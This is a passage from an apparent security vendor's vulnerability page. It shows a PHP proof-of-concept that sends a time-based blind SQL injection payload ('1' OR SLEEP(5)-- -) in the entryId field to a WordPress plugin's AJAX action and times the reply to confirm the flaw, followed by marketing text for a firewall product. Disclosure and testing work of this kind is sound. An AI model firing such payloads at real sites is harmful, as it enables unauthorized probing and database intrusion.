// Step 2: Craft SQL injection payload for entryId parameter
$sql_payload = "1' OR SLEEP(5)-- -"; // Time-based blind injection to test

$post_data = array(
    'action' => 'cg1l_ajax_frontend_get_data', // Vulnerable AJAX action (may need adjustment)
    'entryId' => $sql_payload,
    'nonce' => '' // Nonce might be required
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$t1 = microtime(true);
$response = curl_exec($ch);
$t2 = microtime(true);
curl_close($ch);

$execution_time = $t2 - $t1;
echo "SQL injection test execution time: " . $execution_time . " secondsn";
if ($execution_time >= 5) {
    echo "[+] Vulnerability confirmed: Time-based SQL injection successful.n";
} else {
    echo "[-] Vulnerability not confirmed via time-based test.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations